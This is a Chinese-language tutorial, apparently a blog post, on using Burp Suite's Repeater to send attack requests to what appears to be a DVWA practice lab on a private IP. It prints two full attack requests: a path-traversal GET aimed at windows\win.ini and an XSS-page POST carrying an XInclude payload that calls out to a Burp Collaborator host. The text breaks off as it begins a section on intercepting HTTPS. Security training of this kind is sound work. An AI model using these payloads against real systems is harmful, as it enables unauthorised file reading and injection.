如何用burpsuite进行攻击

一、使用Burpsuite进行攻击：

1、第一步打开burpsuite:

2、第二部点击Repeater:

3、第三步点击粉笔形状的按钮：

4、输入要攻击目标的ip地址与端口号

5、添加攻击报文，进行攻击

6、查看响应结果

完整界面展示如下

注意：

添加攻击报文时：

1、一定不要修改别人的报文，否则会出错！

2、请求头与请求体之间要空两格，否则会导致报文发不出去。

末尾在给大家附上两攻击报文：

Get:攻击报文：

GET /vulnerabilities..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 192.168.198.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.198.133/vulnerabilities/sqli/
Connection: close
Cookie: security=low; seraph.confluence=491521%3A7444b08c55ff568a84291b33f340b906edb86593; PHPSESSID=3rjgm7uiqi0qi2rrocfg6k5m11; security=low
Upgrade-Insecure-Requests: 1

post:攻击报文：

POST /vulnerabilities/xss_s/ HTTP/1.1
Host: 192.168.198.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.198.133/vulnerabilities/xss_s/
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Connection: close
Cookie: seraph.confluence=491521%3A7444b08c55ff568a84291b33f340b906edb86593; PHPSESSID=3rjgm7uiqi0qi2rrocfg6k5m11; security=low
Upgrade-Insecure-Requests: 1

txtName=%3cihc%20xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a%2f%2fpe760gj443bccsu5t0qhzp801r7tvjjk7cu2ir.burpcollaborator.net%2ffoo%22%2f%3e%3c%2fihc%3e&mtxMessage=dasdsa&btnSign=Sign+Guestbook

二、使用BurpSuite拦截HTTPS请求：

网站：https://www.cnblogs.com/lsdb/p/6824416.html

以：FireFox为例：

1、第一步打开工具栏：